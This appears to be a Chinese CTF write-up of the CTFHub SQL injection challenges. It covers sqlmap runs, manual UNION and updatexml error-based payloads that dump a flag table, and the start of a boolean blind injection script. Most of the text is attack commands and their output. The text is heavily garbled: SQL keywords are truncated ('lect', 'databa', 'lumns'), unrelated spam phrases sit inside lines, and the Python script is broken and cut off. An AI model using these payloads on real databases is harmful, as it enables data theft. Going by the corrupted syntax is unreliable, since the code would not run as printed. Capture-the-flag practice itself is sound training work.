Ctfhub解题webSQL注⼊(全部完整版)Ctfhub解题 web SQL注⼊
介绍:记录解题过程
⾏⾸输⼊<3得:
❤
❤
❤
1.整数型注⼊
题⽬描述:通常认为容易被别⼈(他们有可能对你很了解)猜测到或被破解⼯具破解的⼝令均为弱⼝令。⽅法⼀:sqlmap注⼊
好⽤不过sqlmap,直接扫:
<1>.sqlmap爆当前数据库信息
python sqlmap.py -u ":10080/?id=1"--current-db
[16:29:30][INFO] fetching current databa
current databa:'sqli'
⽤sqlmap爆出库名:sqli
<2>.sqlmap.列出指定数据库所有的表名
python sqlmap.py -u ":10080/?id=1"-D sqli --tables
[16:30:07][INFO] retrieved:'news'
[16:30:08][INFO] retrieved:'flag'
Databa: sqli
[2 tables]
+------+
| flag |
| news |
+------+
⽤sqlmap爆出表名:flag,news
❤表格中下拉选项怎么设置
<3>.sqlmap 列出指定表名的所有列名
python sqlmap.py -u ":10080/?id=1"-D sqli -T flag --columns
Databa: sqli
Table: flag
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| flag | varchar(100)|
+--------+--------------+
⽤sqlmap爆出列名:flag
<4>.sqlmap 打印输出表名指定列名字段的值数据
python sqlmap.py -u ":10080/?id=1"-D sqli -T flag -C flag --dump
拿到flag:
Databa: sqli
Table: flag
[1 entry]
+----------------------------------+
| flag |
+----------------------------------+
| ctfhub{c738d407d82740b4fa840800}|
+----------------------------------+
⽅法⼆:⼿⼯注⼊
<1>.使⽤order by n 语句查询字段数
1order by2
lect*from news where id=1order by2
ID: 1
Data: ctfhub
<2>.使⽤union联合查询检测信息回显位置
id=-1union lect1,2
lect*from news where id=id=-1union lect1,2
ID: 1
Data: 2最近很火的抖音音乐
<3>.获取当前数据库名
id=-1union lect1,databa()
lect*from news where id=id=-1union lect1,databa()
ID: 1
Data: sqli
<4>.查询数据库sqli表名
-1union lect1,group_concat(table_name)from information_schema.tables where table_schema='sqli'
lect*from news where id=-1union lect1,group_concat(table_name)from information_schema.tables where table_schema='sqli' ID: 1
Data: news,flag
<5>.获取flag列所有字段名
-1union lect1,group_concat(column_name)from lumns where table_schema='sqli'and table_name='flag'
<6>.获取指定数据库的表的列的内容
双曲线的性质-1union lect1,group_concat(flag)from sqli.flag
-1union lect*from news where id=-1union lect1,group_concat(flag)from sqli.flag
ID: 1
Data: ctfhub{9e78719b9f362a4058891f1f}
2.字符型注⼊
题⽬描述:通常认为容易被别⼈(他们有可能对你很了解)猜测到或被破解⼯具破解的⼝令均为弱⼝令。
⽅法⼀:sqlmap注⼊
同 [整数型注⼊] 的 [⽅法⼀:sqlmap注⼊] 完全相同
拿到flag:
ctfhub{c738d407d82740b4fa840800}
张槎医院⽅法⼆:⼿⼯注⼊
<1>.使⽤order by n 语句查询字段数
1' order by2#
lect*from news where id='1'order by2#'
好宝宝伴奏
ID: 1
Data: ctfhub
<2>.使⽤union联合查询检测信息回显位置
-1' union lect1,2#
lect*from news where id='-1'union lect1,2#'
ID: 1
Data: 2
<3>.获取当前数据库名
-1' union lect1,databa()#
lect*from news where id='-1'union lect1,databa()#'
ID: 1
Data: sqli
<4>.查询数据库sqli表名
-1' union lect 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#
lect*from news where id='-1'union lect1,group_concat(table_name)from information_schema.tables where table_schema='sqli'#' ID: 1
Data: news,flag
<5>.获取flag列所有字段名
-1' union lect 1,group_concat(column_name)from lumns where table_schema='sqli' and table_name='flag'#
<6>.获取指定数据库的表的列的内容(得到flag)
-雨衣用英语怎么说
1' union lect1,group_concat(flag)from sqli.flag#
lect*from news where id='-1'union lect1,group_concat(flag)from sqli.flag#'
ID: 1
Data: ctfhub{d377c961dd1502e2343960ef}
3.报错注⼊
⽅法⼀:sqlmap注⼊
同 [整数型注⼊] 的 [⽅法⼀:sqlmap注⼊] 完全相同
python sqlmap.py -u ":10080/?id=-1"-D sqli -T flag -C flag --dump
Databa: sqli
Table: flag
[1 entry]
+----------------------------------+
| flag |
+----------------------------------+
| ctfhub{74a09bf882367b22ea960956} |
+----------------------------------+
⽅法⼆:⼿⼯注⼊
<1>.查询当前使⽤的数据库:
-1union lect updatexml(1, concat(0x7e,databa(),0x7e),1)
lect*from news where id=1union lect updatexml(1, concat(0x7e,databa(),0x7e),1)
查询错误: XPATH syntax error: '~sqli~'
<2>.查询数据库表名:
-
1union lect updatexml(1, concat(0x7e,(lect( group_concat( table_name))from information_schema.tables where table_schema="sqli"),0x7e),1)
lect*from news where id=-1union lect updatexml(1, concat(0x7e,(lect( group_concat( table_name))from information_schema.tables where table_ schema="sqli"),0x7e),1)
查询错误: XPATH syntax error: '~news,flag~'
<3>.获取表的字段名:
where table_schema='sqli'and table_name='flag'#
-1union lect updatexml(1, concat(0x7e,(lect( group_concat(column_name))from lumns where table_schema='sqli'and table_ name='flag'),0x7e),1)
澳门游玩攻略lect*from news where id=-1union lect updatexml(1, concat(0x7e,(lect( group_concat(column_name))from lumns where ta ble_schema='sqli'and table_name='flag'),0x7e),1)
查询错误: XPATH syntax error: '~flag~'
<4>.获取指定数据库的表的列的内容(得到flag):
-1union lect updatexml(1, concat(0x7e,(lect( group_concat(flag))from sqli.flag),0x7e),1)
lect*from news where id=-1union lect updatexml(1, concat(0x7e,(lect( group_concat(flag))from sqli.flag),0x7e),1)查询错误: XPATH syntax error: '~ctfhub{74a09bf882367b22ea960956'
<5>.加上}得到flag:
ctfhub{74a09bf882367b22ea960956
4.布尔盲注
⽅法⼀:sqlmap注⼊
同 [整数型注⼊] 的 [⽅法⼀:sqlmap注⼊] 完全相同
python sqlmap.py -u ":10080/?id=1"-D sqli -T flag -C flag --dump
[20:02:24][ERROR] invalid character detected. retrying..
[20:02:24][WARNING] increasing time delay to2 conds
hub{aa7bab6b0dd1a301df6a345d}
Databa: sqli
Table: flag
[1 entry]
+----------------------------------+
| flag |
+----------------------------------+
| ctfhub{aa7bab6b0dd1a301df6a345d} |
+----------------------------------+
⽅法⼆:脚本注⼊
参考
python脚本如下,换⼀下payload就可以测了
import requests
class InjeSql(object):
def__init__(lf, url, payload_length, payload_Data, name, conditions, name_length, max_len=12):
lf.url = url
lf.payload_length = payload_length
任宏伟lf.payload_Data = payload_Data
lf.max_len = max_len # 数据库名、表名等长度上限
lf.name = name
lf.name_length = name_length
def getLength(lf):
for i in range(1, lf.max_len):
payload = lf.payload_length % i
r = (lf.url + payload +'%23')
ditions :
lf.name_leng = i
print(lf.name+"的长度是", i)
break
def getData(lf):
name =''
for j in range(1, lf.name_length +1):
for i in'abcdefghijklmnopqrstuvwxyz}{0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ':
url = lf.url + lf.payload_Data %(j, i)
r = (url +'%23')
if'query_success':
